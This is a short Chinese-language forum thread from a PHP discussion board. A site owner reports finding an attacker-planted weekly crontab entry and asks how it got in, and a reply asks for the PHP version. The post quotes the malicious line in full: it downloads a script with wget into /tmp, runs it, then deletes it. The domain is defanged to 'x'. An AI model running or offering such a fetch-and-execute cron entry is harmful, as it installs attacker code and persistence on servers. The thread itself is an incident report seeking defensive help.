看板 PHP 關於我們 聯絡資訊
我的站台的crontab 被寫入 @weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1 目前已知不影響主機,因為URL已經失效了。 PS.貼出來的URL已經處理過了,domain我改成x,以防被誤點。 但實在找不出他植入的方法,有人知道嗎? PHP是否有什麼漏洞能讓入侵者植入這個script嗎? -- 小惡魔的家 http://blog.pixnet.net/shiuju/ -- ※ 編輯: averywu (60.251.237.155), 10/01/2014 11:20:00
mmis1000: 版本?記得舊版之前有爆出大洞? 10/01 12:35
averywu: PHP版本是5.3 10/02 10:27